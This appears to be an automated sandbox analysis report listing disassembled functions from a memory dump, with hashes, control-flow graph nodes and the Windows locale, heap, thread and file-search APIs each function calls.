                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLastThread
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1689873465-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 759db46889ba4785e54bf1fd7af03d43e91ec6d7635d93864435157ebffbb47e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 51bcf92dcee9a873a6f9c8f772cfcbd6cc01a26c82dee84fbd54fa1f59de67ab
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 759db46889ba4785e54bf1fd7af03d43e91ec6d7635d93864435157ebffbb47e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E015E7250421ABFDF15AFA4DC1AAEE7BB6EF40364F048258F80296290DB75CA50DB94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(006DF178,0000000C), ref: 00684DB2
                                                                                                                                                                                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 00684DB9
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ErrorExitLastThreadUser
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1750398979-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 281caa03cf04f0fa62f2dcfbed7c967149c705bd22611b4d5f64a2931a7f035d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e8e468be4af8a3280aabe531e94b7719c4a4010e7c95f82c80d1e6df6eca0ee7
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 281caa03cf04f0fa62f2dcfbed7c967149c705bd22611b4d5f64a2931a7f035d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71F08C70940205AFDB44BFB4C84AAED7B76AF41310F14814DF416A7292CF345941DB55
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 210 6a18f8-6a1920 211 6a1922-6a1924 210->211 212 6a1926-6a1928 210->212 213 6a1977-6a197a 211->213 214 6a192a-6a192c 212->214 215 6a192e-6a1935 call 6a17fb 212->215 214->213 217 6a193a-6a193e 215->217 218 6a195d-6a1974 217->218 219 6a1940-6a194e GetProcAddress 217->219 220 6a1976 218->220 219->218 221 6a1950-6a195b call 6144e9 219->221 220->213 221->220
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b975da03be4694679834f293ae48b17a0a6e19cd8469e364dfe4c00f0f0c1dc4
                                                                                                                                                                                                                                                                                                                  • Instruction ID: dbac02cb589be0205a310c23861a286170e71e21b4240a706d72bfe7ee5e03b8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b975da03be4694679834f293ae48b17a0a6e19cd8469e364dfe4c00f0f0c1dc4
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001B1377042156F9B26AE6DFC5199B33E7AB87360B24C125F944DF298DA34DC02CA94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 224 69f726-69f731 225 69f73f-69f745 224->225 226 69f733-69f73d 224->226 228 69f75e-69f76f RtlAllocateHeap 225->228 229 69f747-69f748 225->229 226->225 227 69f773-69f77e call 6139b8 226->227 233 69f780-69f782 227->233 230 69f74a-69f751 call 614854 228->230 231 69f771 228->231 229->228 230->227 237 69f753-69f75c call 6140f7 230->237 231->233 237->227 237->228
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?), ref: 0069F767
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c96379bd085be7a393783c4576f4d212e73e639f08f2512deba1c59efd68a53
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8865b96d94b1eb06cca69cc073e74eb508b19b3035e390cc1970c2eaf2bb2e26
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c96379bd085be7a393783c4576f4d212e73e639f08f2512deba1c59efd68a53
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11F0B431204124769F611BB6BC45ADA375FDB41760B1AC136E804DF680DE60DA0192E9
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 240 69f7e8-69f7f4 241 69f826-69f831 call 6139b8 240->241 242 69f7f6-69f7f8 240->242 250 69f833-69f835 241->250 243 69f7fa-69f7fb 242->243 244 69f811-69f822 RtlAllocateHeap 242->244 243->244 246 69f7fd-69f804 call 614854 244->246 247 69f824 244->247 246->241 252 69f806-69f80f call 6140f7 246->252 247->250 252->241 252->244
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 0069F81A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72d2a695f725232b681f32a354f37af1b2e766a02e42c148b01b46ad949c98b1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f542e2f2eec01c8c454a287658c7e5e9fa018fccd6fd9ff738530527669e2f80
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72d2a695f725232b681f32a354f37af1b2e766a02e42c148b01b46ad949c98b1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE0E5312006216BEFB02769AD00BDA366FAB413F0F168130AC51DBAD0DF61DC0281EA
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 006B0E99
                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 006B0EC2
                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 006B0ED7
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d920bd938a3f80b866f4ee244f94d80fab6431b80661bd892c5086ac738af2e2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d9c2c0af2154ad0b2bb918f2b66f9b6d4a8c05a3e02ef895f46634068b064ab
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d920bd938a3f80b866f4ee244f94d80fab6431b80661bd892c5086ac738af2e2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D22195A2644205A6FB348F55C901BDB7AA7EF94B60B568D64E90ADB310E732DDC3C390
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 006B1155
                                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006B119E
                                                                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 006B11AD
                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 006B11F5
                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 006B1214
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3475089800-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 573a37687fa72d7008549ceee5451d1983a4ba1d700ff25ca4de0854dc17f462
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 57c54eb0f5675326f25e6ffc23f202d7fe3bf246767c7d91b148d3641beadf56
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 573a37687fa72d7008549ceee5451d1983a4ba1d700ff25ca4de0854dc17f462
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 105164B1A00209BFDB20DFA9DC51AFB77BAFF45700F444469E910EB290DB719A81CB65
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 006B052E
                                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006B0559
                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 006B073A
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                                                                                  • API String ID: 790303815-905460609
                                                                                                                                                                                                                                                                                                                  • Opcode ID: abd076dec0b42a2d00a1239ea0acbac6bc92def5303ce080da55e6b34bbbdfc4
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 201475dd188a4afb7b36db186de9426d0437fbfa39a1a2ef3651308606fe46f8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abd076dec0b42a2d00a1239ea0acbac6bc92def5303ce080da55e6b34bbbdfc4
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F471FAB1600206AAEB34AB75CC46BEB7BAAEF44300F14446DF606D7281FB74ED91C765
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 006AB83C
                                                                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 006AB8B7
                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 006AB8D9
                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 006AB8FC
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
